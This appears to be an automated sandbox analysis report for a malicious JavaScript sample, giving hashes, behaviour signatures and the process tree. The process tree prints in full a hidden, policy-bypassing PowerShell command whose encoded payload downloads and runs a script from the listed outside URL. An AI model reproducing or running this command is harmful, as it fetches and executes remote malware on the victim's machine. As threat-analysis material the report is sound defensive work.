Analysis
-
max time kernel
149s -
max time network
188s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
26-12-2023 03:56
Static task
static1
Behavioral task
behavioral1
Sample
522af5c23380f540b7b3bbd92206a16e.js
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
522af5c23380f540b7b3bbd92206a16e.js
Resource
win10v2004-20231215-en
General
-
Target
522af5c23380f540b7b3bbd92206a16e.js
-
Size
110KB
-
MD5
522af5c23380f540b7b3bbd92206a16e
-
SHA1
fc7dfa569521049159af27220528383427bec01e
-
SHA256
646d5a044c9df4a6f311f46d0bce5df9676bcf15e8706b9b6ff48a1e1b899948
-
SHA512
9f72c361b6e4e04c93ecbcdc983318fd9b62e9380663eaed416b0954e8b10e3d1748aebf10a2428a0c1f2d572e8f3273551d852463ba0575e9d8a673103ed015
-
SSDEEP
3072:QTOP5kUxF5GVBWbI3CPVgF9Ry98guHVBqqg2bcruzUHmLKeMMU7GwbWBPwVGWl9v:QTOhkUbWwc3RF9Ry9RuXqW4SzUHmLKee
Malware Config
Extracted
http://smart-integrator.hr/pornhub.php
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 3 2548 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2548 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2548 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 2908 wrote to memory of 1632 2908 wscript.exe 27 PID 2908 wrote to memory of 1632 2908 wscript.exe 27 PID 2908 wrote to memory of 1632 2908 wscript.exe 27 PID 1632 wrote to memory of 2548 1632 cmd.exe 29 PID 1632 wrote to memory of 2548 1632 cmd.exe 29 PID 1632 wrote to memory of 2548 1632 cmd.exe 29
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\522af5c23380f540b7b3bbd92206a16e.js1⤵
- Suspicious use of WriteProcessMemory
PID:2908 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBtAGEAcgB0AC0AaQBuAHQAZQBnAHIAYQB0AG8AcgAuAGgAcgAvAHAAbwByAG4AaAB1AGIALgBwAGgAcAAiACkA2⤵
- Suspicious use of WriteProcessMemory
PID:1632 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepoWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBtAGEAcgB0AC0AaQBuAHQAZQBnAHIAYQB0AG8AcgAuAGgAcgAvAHAAbwByAG4AaAB1AGIALgBwAGgAcAAiACkA3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2548
-
-